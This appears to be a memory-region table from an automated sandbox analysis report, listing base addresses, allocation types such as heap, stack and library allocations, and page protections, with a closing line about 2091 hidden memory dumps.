31A4000
trusted library allocation
page read and write
3B91000
heap
page read and write
4D5D000
heap
page read and write
43A1000
trusted library allocation
page read and write
570000
trusted library allocation
page read and write
385B000
trusted library allocation
page read and write
3B91000
heap
page read and write
583E000
trusted library allocation
page read and write
29D000
heap
page read and write
5DA5000
heap
page read and write
4F56000
trusted library allocation
page read and write
583E000
trusted library allocation
page read and write
5041000
heap
page read and write
21CF000
stack
page read and write
3B21000
heap
page read and write
566E000
heap
page read and write
566E000
heap
page read and write
3B8A000
heap
page read and write
12D000
heap
page read and write
5080000
heap
page read and write
AE3000
heap
page read and write
7FE89AA0000
trusted library allocation
page execute and read and write
3B00000
trusted library allocation
page read and write
420000
heap
page read and write
3B6000
heap
page read and write
3981000
heap
page read and write
51D9000
heap
page read and write
2163000
heap
page read and write
1B2AE000
heap
page read and write
7FE89A50000
trusted library allocation
page read and write
7FE89B50000
trusted library allocation
page read and write
327F000
trusted library allocation
page read and write
26FA000
trusted library allocation
page read and write
3BA000
heap
page read and write
5940000
trusted library allocation
page read and write
10000
heap
page read and write
50BE000
heap
page read and write
2266000
heap
page read and write
7FE89A47000
trusted library allocation
page read and write
371F000
heap
page read and write
3B7F000
heap
page read and write
3AD7000
heap
page read and write
53E7000
heap
page read and write
4CA000
heap
page read and write
55CC000
heap
page read and write
515A000
heap
page read and write
10000
heap
page read and write
3B4C000
heap
page read and write
428E000
trusted library allocation
page read and write
3D7000
heap
page read and write
371F000
heap
page read and write
50C9000
heap
page read and write
4839000
heap
page read and write
25E000
heap
page read and write
429000
heap
page read and write
290000
heap
page read and write
253E000
stack
page read and write
55CC000
heap
page read and write
47C000
heap
page read and write
5C8A000
heap
page read and write
7FE898A3000
trusted library allocation
page read and write
278000
heap
page read and write
32DF000
stack
page read and write
583E000
trusted library allocation
page read and write
3B88000
heap
page read and write
3ED0000
trusted library allocation
page read and write
1CD7000
direct allocation
page read and write
32FD000
trusted library allocation
page read and write
3197000
trusted library allocation
page read and write
36F4000
heap
page read and write
445000
heap
page read and write
1AFB0000
heap
page read and write
40EE000
trusted library allocation
page read and write
383F000
stack
page read and write
26A0000
heap
page read and write
385B000
trusted library allocation
page read and write
1C0000
heap
page read and write
36B6000
heap
page read and write
3986000
heap
page read and write
2619000
trusted library allocation
page read and write
3858000
trusted library allocation
page read and write
7FE89B90000
trusted library allocation
page read and write
268F000
stack
page read and write
1AE000
stack
page read and write
1AD1E000
heap
page read and write
55CC000
heap
page read and write
583E000
trusted library allocation
page read and write
3276000
trusted library allocation
page read and write
51C2000
heap
page read and write
4E5000
heap
page read and write
40D000
heap
page read and write
4D99000
heap
page read and write
1DA0000
heap
page read and write
515A000
heap
page read and write
4D97000
heap
page read and write
2E5000
heap
page read and write
38AC000
stack
page read and write
42B000
heap
page read and write
3453000
direct allocation
page read and write
42B000
heap
page read and write
1E90000
heap
page read and write
2291000
trusted library allocation
page read and write
3580000
trusted library allocation
page read and write
3703000
heap
page read and write
1E60000
direct allocation
page read and write
3858000
trusted library allocation
page read and write
AE0000
heap
page read and write
280000
heap
page read and write
1ACE5000
heap
page read and write
43A1000
trusted library allocation
page read and write
4D88000
heap
page read and write
46A000
heap
page read and write
36E4000
heap
page read and write
40EE000
trusted library allocation
page read and write
7FE898C3000
trusted library allocation
page read and write
2A2F000
stack
page read and write
3703000
heap
page read and write
1A5E4000
heap
page execute and read and write
7FE89BC0000
trusted library allocation
page read and write
373000
heap
page read and write
4E6000
heap
page read and write
1ACEF000
heap
page read and write
4FA000
heap
page read and write
1D30000
direct allocation
page read and write
583E000
trusted library allocation
page read and write
3AD000
heap
page read and write
517B000
heap
page read and write
2EC000
heap
page read and write
385B000
trusted library allocation
page read and write
7FE89A90000
trusted library allocation
page read and write
404000
heap
page read and write
144000
heap
page read and write
1C215000
heap
page read and write
4F70000
trusted library allocation
page read and write
2FF000
heap
page read and write
4D4000
heap
page read and write
3D0000
heap
page read and write
4C0000
heap
page read and write
581E000
trusted library allocation
page read and write
4D99000
heap
page read and write
3977000
heap
page read and write
1E40000
direct allocation
page read and write
466000
heap
page read and write
3CD0000
trusted library allocation
page read and write
3A8000
heap
page read and write
51CD000
heap
page read and write
43A1000
trusted library allocation
page read and write
2130000
heap
page read and write
36DD000
heap
page read and write
472000
heap
page read and write
439000
heap
page read and write
28D5000
heap
page read and write
428E000
trusted library allocation
page read and write
3AAC000
heap
page read and write
581E000
trusted library allocation
page read and write
32F2000
trusted library allocation
page read and write
318E000
stack
page read and write
2154000
heap
page read and write
5854000
trusted library allocation
page read and write
3AAD000
heap
page read and write
7FE89BA0000
trusted library allocation
page read and write
4D94000
heap
page read and write
379000
heap
page read and write
40EE000
trusted library allocation
page read and write
4F56000
trusted library allocation
page read and write
1E20000
direct allocation
page read and write
50C1000
heap
page read and write
1C30F000
stack
page read and write
3858000
trusted library allocation
page read and write
3260000
remote allocation
page read and write
22F000
heap
page read and write
2D9000
heap
page read and write
5E0F000
heap
page read and write
428E000
trusted library allocation
page read and write
32D3000
trusted library allocation
page read and write
5720000
trusted library allocation
page read and write
3B7B000
heap
page read and write
1F00000
direct allocation
page read and write
1FE3000
heap
page read and write
1AEBB000
stack
page read and write
5186000
heap
page read and write
5532000
heap
page read and write
19F20000
trusted library allocation
page read and write
32EE000
trusted library allocation
page read and write
319D000
trusted library allocation
page read and write
40B000
heap
page read and write
3B69000
heap
page read and write
5468000
heap
page read and write
1C04B000
heap
page read and write
377000
heap
page read and write
1B65D000
stack
page read and write
53BC000
heap
page read and write
43AD000
trusted library allocation
page read and write
27DE000
stack
page read and write
3A4F000
heap
page read and write
499000
heap
page read and write
53B4000
heap
page read and write
3C70000
trusted library allocation
page read and write
515C000
heap
page read and write
1B216000
heap
page read and write
4D54000
heap
page read and write
55BA000
heap
page read and write
3B77000
heap
page read and write
3ACD000
heap
page read and write
546000
heap
page read and write
1BA4000
heap
page read and write
2C8000
stack
page read and write
4FA000
heap
page read and write
40EE000
trusted library allocation
page read and write
33A000
heap
page read and write
37E000
stack
page read and write
55C2000
heap
page read and write
196000
heap
page read and write
2E0000
heap
page read and write
3840000
heap
page read and write
1F20000
direct allocation
page read and write
428E000
trusted library allocation
page read and write
428E000
trusted library allocation
page read and write
41B000
system
page execute and read and write
40EE000
trusted library allocation
page read and write
51D000
heap
page read and write
413000
heap
page read and write
2B9F000
stack
page read and write
1CED000
direct allocation
page read and write
5770000
trusted library allocation
page read and write
1A5E8000
heap
page execute and read and write
4D10000
heap
page read and write
27C000
heap
page read and write
367000
heap
page read and write
584000
heap
page read and write
551000
heap
page read and write
A3000
stack
page read and write
4AA000
heap
page read and write
271E000
trusted library allocation
page read and write
55BA000
heap
page read and write
1B80000
trusted library allocation
page read and write
4E0F000
heap
page read and write
42B000
heap
page read and write
1ACDD000
heap
page read and write
4E0F000
heap
page read and write
51DA000
heap
page read and write
371C000
heap
page read and write
55BC000
heap
page read and write
17E000
heap
page read and write
1CD3000
direct allocation
page read and write
10000
heap
page read and write
2716000
trusted library allocation
page read and write
583E000
trusted library allocation
page read and write
4BB000
heap
page read and write
184000
heap
page read and write
5C4F000
heap
page read and write
3AE000
heap
page read and write
1ED0000
heap
page read and write
3B8B000
heap
page read and write
412000
heap
page read and write
1AC9F000
stack
page read and write
22C0000
heap
page execute and read and write
6D56000
trusted library allocation
page read and write
1C2000
stack
page read and write
277F000
stack
page read and write
3B8F000
heap
page read and write
43AD000
trusted library allocation
page read and write
7FE89A60000
trusted library allocation
page execute and read and write
7FE898B2000
trusted library allocation
page read and write
374000
heap
page read and write
569C000
heap
page read and write
533000
heap
page read and write
3AF000
heap
page read and write
36D9000
heap
page read and write
57F000
trusted library allocation
page read and write
1DE0000
heap
page read and write
4A0000
heap
page read and write
415000
heap
page read and write
36F4000
heap
page read and write
7FE89B80000
trusted library allocation
page read and write
360000
heap
page read and write
3B00000
trusted library allocation
page read and write
429000
heap
page read and write
4D5F000
heap
page read and write
55F000
heap
page read and write
1CD0000
direct allocation
page read and write
3B8A000
heap
page read and write
1ACEA000
heap
page read and write
368000
heap
page read and write
398000
heap
page read and write
36E4000
heap
page read and write
442000
heap
page read and write
5849000
trusted library allocation
page read and write
1D60000
heap
page read and write
6D56000
trusted library allocation
page read and write
1A8F9000
stack
page read and write
425F000
stack
page read and write
53B4000
heap
page read and write
3B2000
heap
page read and write
327B000
trusted library allocation
page read and write
371F000
heap
page read and write
43A1000
trusted library allocation
page read and write
4D56000
heap
page read and write
22AE000
stack
page read and write
581E000
trusted library allocation
page read and write
581E000
trusted library allocation
page read and write
581E000
trusted library allocation
page read and write
5651000
heap
page read and write
1F14000
heap
page read and write
4F4000
heap
page read and write
3F2E000
stack
page read and write
53E8000
heap
page read and write
467000
heap
page read and write
9F56000
trusted library allocation
page read and write
569C000
heap
page read and write
4A7000
heap
page read and write
3620000
heap
page read and write
5392000
heap
page read and write
1BC6000
heap
page read and write
5870000
trusted library allocation
page read and write
10000
heap
page read and write
1DDB000
heap
page read and write
581E000
trusted library allocation
page read and write
1F10000
heap
page read and write
55CC000
heap
page read and write
1CC0000
direct allocation
page read and write
581E000
trusted library allocation
page read and write
7FE89B60000
trusted library allocation
page read and write
5DC9000
heap
page read and write
1CAEE000
stack
page read and write
5CDD000
heap
page read and write
5C72000
heap
page read and write
5666000
heap
page read and write
3C6000
heap
page read and write
514000
heap
page read and write
327D000
trusted library allocation
page read and write
1A6CF000
stack
page read and write
4D0000
heap
page read and write
3B3000
heap
page read and write
17E000
heap
page read and write
1C770000
heap
page read and write
5CAD000
heap
page read and write
3B8A000
heap
page read and write
36FB000
heap
page read and write
1EA7000
direct allocation
page read and write
565C000
heap
page read and write
474000
heap
page read and write
40EE000
trusted library allocation
page read and write
32D3000
trusted library allocation
page read and write
32A0000
trusted library allocation
page read and write
4E5D000
heap
page read and write
1E16000
heap
page read and write
5663000
heap
page read and write
569C000
heap
page read and write
55C0000
heap
page read and write
3AA0000
heap
page read and write
522000
heap
page read and write
3820000
trusted library allocation
page read and write
47E000
heap
page read and write
A7000
heap
page read and write
2BEF000
stack
page read and write
7FE898CB000
trusted library allocation
page read and write
6B0000
heap
page read and write
4E01000
heap
page read and write
473000
system
page execute and read and write
3A0000
heap
page read and write
583E000
trusted library allocation
page read and write
385B000
trusted library allocation
page read and write
374000
heap
page read and write
3858000
trusted library allocation
page read and write
23FF000
stack
page read and write
32F7000
trusted library allocation
page read and write
5640000
heap
page read and write
4F9000
heap
page read and write
4D92000
heap
page read and write
4C0000
heap
page read and write
331000
heap
page read and write
5060000
heap
page read and write
581E000
trusted library allocation
page read and write
F5000
stack
page read and write
4E06000
heap
page read and write
459000
system
page execute and read and write
566E000
heap
page read and write
580000
heap
page read and write
2840000
trusted library allocation
page execute read
51BD000
heap
page read and write
7FE89AC0000
trusted library allocation
page read and write
1B296000
heap
page read and write
12091000
trusted library allocation
page read and write
31A2000
trusted library allocation
page read and write
3B77000
heap
page read and write
27B0000
heap
page read and write
3986000
heap
page read and write
6356000
trusted library allocation
page read and write
3C6000
heap
page read and write
1CDF000
direct allocation
page read and write
36FA000
heap
page read and write
7FE89B20000
trusted library allocation
page read and write
556F000
heap
page read and write
3B8A000
heap
page read and write
1B460000
heap
page read and write
51D6000
heap
page read and write
5D00000
heap
page read and write
411000
heap
page read and write
1CE4000
heap
page read and write
132000
heap
page read and write
37B0000
trusted library allocation
page read and write
293F000
stack
page read and write
5854000
trusted library allocation
page read and write
4D58000
heap
page read and write
408000
heap
page read and write
51D9000
heap
page read and write
4D95000
heap
page read and write
5940000
trusted library allocation
page read and write
40B000
heap
page read and write
4D99000
heap
page read and write
1A9E5000
stack
page read and write
4EF000
heap
page read and write
264E000
stack
page read and write
566C000
heap
page read and write
53B6000
heap
page read and write
51D6000
heap
page read and write
3DE000
heap
page read and write
2E4000
heap
page read and write
48A000
heap
page read and write
10000
heap
page read and write
20000
heap
page read and write
3B93000
heap
page read and write
55BA000
heap
page read and write
378000
heap
page read and write
3B66000
heap
page read and write
517B000
heap
page read and write
36EA000
heap
page read and write
50DA000
heap
page read and write
54ED000
heap
page read and write
3858000
trusted library allocation
page read and write
3447000
direct allocation
page read and write
50CE000
heap
page read and write
55CF000
heap
page read and write
2717000
trusted library allocation
page read and write
3876000
heap
page read and write
51D9000
heap
page read and write
428E000
trusted library allocation
page read and write
2600000
trusted library allocation
page read and write
40EE000
trusted library allocation
page read and write
5DF8000
heap
page read and write
45D000
system
page execute and read and write
2F9000
heap
page read and write
10000
heap
page read and write
3B66000
heap
page read and write
3A7000
heap
page read and write
583E000
trusted library allocation
page read and write
55CE000
heap
page read and write
55CE000
heap
page read and write
1D20000
heap
page read and write
5666000
heap
page read and write
5674000
heap
page read and write
8156000
trusted library allocation
page read and write
2FD000
heap
page read and write
270A000
trusted library allocation
page read and write
4DC000
heap
page read and write
583E000
trusted library allocation
page read and write
26A000
heap
page read and write
140000
heap
page read and write
385B000
trusted library allocation
page read and write
1B1C9000
heap
page read and write
400000
system
page execute and read and write
120000
heap
page read and write
7FE89A30000
trusted library allocation
page read and write
3A4000
stack
page read and write
581E000
trusted library allocation
page read and write
3A4F000
heap
page read and write
3A00000
heap
page read and write
1AFB4000
heap
page read and write
3E2000
heap
page read and write
543000
heap
page read and write
50BE000
heap
page read and write
43AD000
trusted library allocation
page read and write
4D97000
heap
page read and write
3EF000
heap
page read and write
385B000
trusted library allocation
page read and write
3193000
trusted library allocation
page read and write
1B34B000
stack
page read and write
7FE89A92000
trusted library allocation
page read and write
23F000
heap
page read and write
49D000
heap
page read and write
3B93000
heap
page read and write
267F000
stack
page read and write
583E000
trusted library allocation
page read and write
F2000
stack
page read and write
428E000
trusted library allocation
page read and write
17E000
heap
page read and write
5849000
trusted library allocation
page read and write
41B000
heap
page read and write
50BE000
heap
page read and write
7FE898BD000
trusted library allocation
page execute and read and write
7FE8994C000
trusted library allocation
page execute and read and write
36F4000
heap
page read and write
43A1000
trusted library allocation
page read and write
2C7F000
stack
page read and write
54ED000
heap
page read and write
2E74000
trusted library allocation
page read and write
414000
heap
page read and write
385B000
trusted library allocation
page read and write
1ACA0000
heap
page read and write
581E000
trusted library allocation
page read and write
31A2000
trusted library allocation
page read and write
464000
heap
page read and write
50BF000
heap
page read and write
54ED000
heap
page read and write
AEC000
heap
page read and write
428E000
trusted library allocation
page read and write
5849000
trusted library allocation
page read and write
3B21000
heap
page read and write
428E000
trusted library allocation
page read and write
386000
stack
page read and write
53AB000
heap
page read and write
4D97000
heap
page read and write
108000
heap
page read and write
36E0000
heap
page read and write
319D000
trusted library allocation
page read and write
220000
heap
page read and write
428E000
trusted library allocation
page read and write
55CC000
heap
page read and write
397D000
heap
page read and write
515A000
heap
page read and write
5849000
trusted library allocation
page read and write
3191000
trusted library allocation
page read and write
1CF0000
direct allocation
page read and write
140000
heap
page read and write
2940000
trusted library allocation
page execute read
1B71C000
stack
page read and write
37B000
heap
page read and write
475000
heap
page read and write
1DD4000
heap
page read and write
3B7B000
heap
page read and write
3CE000
heap
page read and write
190000
heap
page read and write
3BC0000
trusted library allocation
page read and write
7FE89B30000
trusted library allocation
page read and write
1C29E000
heap
page read and write
515A000
heap
page read and write
216000
stack
page read and write
3B66000
heap
page read and write
4EFD000
heap
page read and write
4A0000
heap
page read and write
1AF0E000
stack
page read and write
411000
heap
page read and write
7FE899B0000
trusted library allocation
page execute and read and write
4D51000
heap
page read and write
428E000
trusted library allocation
page read and write
36B6000
heap
page read and write
3858000
trusted library allocation
page read and write
40EE000
trusted library allocation
page read and write
3282000
trusted library allocation
page read and write
2FDB000
stack
page read and write
5570000
heap
page read and write
581E000
trusted library allocation
page read and write
54AA000
heap
page read and write
3B66000
heap
page read and write
28FF000
stack
page read and write
3858000
trusted library allocation
page read and write
5694000
heap
page read and write
530000
heap
page read and write
31A2000
trusted library allocation
page read and write
3703000
heap
page read and write
350000
direct allocation
page read and write
327D000
trusted library allocation
page read and write
32EF000
trusted library allocation
page read and write
40EE000
trusted library allocation
page read and write
1B84000
heap
page read and write
7FE89B20000
trusted library allocation
page read and write
3420000
direct allocation
page read and write
4E06000
heap
page read and write
1A7CB000
stack
page read and write
583E000
trusted library allocation
page read and write
469000
heap
page read and write
2C3F000
stack
page read and write
4C0000
heap
page read and write
7FE89A94000
trusted library allocation
page read and write
54EC000
heap
page read and write
238000
heap
page read and write
428E000
trusted library allocation
page read and write
39F4000
heap
page read and write
3282000
trusted library allocation
page read and write
1AF6F000
stack
page read and write
385B000
trusted library allocation
page read and write
24AE000
stack
page read and write
55BE000
heap
page read and write
2F7000
heap
page read and write
32FD000
trusted library allocation
page read and write
36C5000
heap
page read and write
40EE000
trusted library allocation
page read and write
39F000
stack
page read and write
50DA000
heap
page read and write
564A000
heap
page read and write
32A3000
trusted library allocation
page read and write
4D64000
heap
page read and write
5186000
heap
page read and write
583E000
trusted library allocation
page read and write
5651000
heap
page read and write
428E000
trusted library allocation
page read and write
41A000
heap
page read and write
1F98000
heap
page read and write
583E000
trusted library allocation
page read and write
256F000
stack
page read and write
6356000
trusted library allocation
page read and write
DE000
heap
page read and write
288000
heap
page read and write
5C2C000
heap
page read and write
530000
heap
page read and write
436000
heap
page read and write
1CBAE000
stack
page read and write
566C000
heap
page read and write
400A000
stack
page read and write
208000
stack
page read and write
51D9000
heap
page read and write
3B8D000
heap
page read and write
3858000
trusted library allocation
page read and write
5D0C000
heap
page read and write
29CB000
heap
page read and write
4A0000
heap
page read and write
569000
heap
page read and write
395B000
stack
page read and write
515A000
heap
page read and write
3BBD000
stack
page read and write
1B90000
heap
page read and write
4E01000
heap
page read and write
7FE89C10000
trusted library allocation
page read and write
4BB000
heap
page read and write
2756000
trusted library allocation
page read and write
36B2000
heap
page read and write
5E85000
heap
page read and write
3370000
trusted library allocation
page read and write
5854000
trusted library allocation
page read and write
54F0000
heap
page read and write
7FE89970000
trusted library allocation
page execute and read and write
371F000
heap
page read and write
4E0E000
heap
page read and write
3279000
trusted library allocation
page read and write
45C000
system
page execute and read and write
581E000
trusted library allocation
page read and write
517B000
heap
page read and write
1C64A000
stack
page read and write
26F1000
trusted library allocation
page read and write
1F10000
heap
page read and write
7FE89C00000
trusted library allocation
page read and write
3858000
trusted library allocation
page read and write
40EE000
trusted library allocation
page read and write
5C37000
heap
page read and write
3683000
heap
page read and write
51DB000
heap
page read and write
50DC000
heap
page read and write
41A000
heap
page read and write
3B93000
heap
page read and write
3700000
trusted library allocation
page read and write
7FE89976000
trusted library allocation
page execute and read and write
3F0000
heap
page read and write
536A000
heap
page read and write
2F9000
heap
page read and write
5CB9000
heap
page read and write
428E000
trusted library allocation
page read and write
3BC0000
trusted library allocation
page read and write
3858000
trusted library allocation
page read and write
3B93000
heap
page read and write
11F21000
trusted library allocation
page read and write
3633000
heap
page read and write
3B62000
heap
page read and write
55C2000
heap
page read and write
319D000
trusted library allocation
page read and write
51C2000
heap
page read and write
44D000
heap
page read and write
34F0000
heap
page read and write
3453000
direct allocation
page read and write
5854000
trusted library allocation
page read and write
46E000
stack
page read and write
3810000
heap
page read and write
566C000
heap
page read and write
1DBE000
stack
page read and write | page guard
3B63000
heap
page read and write
54AE000
heap
page read and write
7FE89A80000
trusted library allocation
page execute and read and write
40EE000
trusted library allocation
page read and write
38B0000
heap
page read and write
3A47000
heap
page read and write
370000
heap
page read and write
7FE89A94000
trusted library allocation
page read and write
1BE6000
heap
page read and write
3858000
trusted library allocation
page read and write
51D9000
heap
page read and write
32E8000
trusted library allocation
page read and write
43A1000
trusted library allocation
page read and write
4FA000
heap
page read and write
189000
heap
page read and write
1AFF6000
heap
page read and write
1C17E000
stack
page read and write
370000
heap
page read and write
4E0000
heap
page read and write
3ADA000
heap
page read and write
867000
heap
page read and write
2133000
heap
page read and write
36EA000
heap
page read and write
5666000
heap
page read and write
4F10000
trusted library allocation
page read and write
3199000
trusted library allocation
page read and write
36B6000
heap
page read and write
1C0DF000
stack
page read and write
55BC000
heap
page read and write
51D5000
heap
page read and write
3C3000
heap
page read and write
581E000
trusted library allocation
page read and write
4E0E000
heap
page read and write
3B7F000
heap
page read and write
40EE000
trusted library allocation
page read and write
3277000
trusted library allocation
page read and write
329F000
trusted library allocation
page read and write
3B69000
heap
page read and write
2731000
trusted library allocation
page read and write
1F40000
direct allocation
page read and write
1C210000
heap
page read and write
32FA000
trusted library allocation
page read and write
581E000
trusted library allocation
page read and write
7FE89950000
trusted library allocation
page execute and read and write
5041000
heap
page read and write
1B1A5000
heap
page read and write
2A9F000
stack
page read and write
3705000
heap
page read and write
4E63000
heap
page read and write
50DA000
heap
page read and write
515C000
heap
page read and write
3CCB000
stack
page read and write
12C000
heap
page read and write
5661000
heap
page read and write
33F000
heap
page read and write
36EA000
heap
page read and write
507000
heap
page read and write
3B56000
trusted library allocation
page read and write
1E40000
heap
page read and write
There are 2091 hidden memdumps, click here to show them.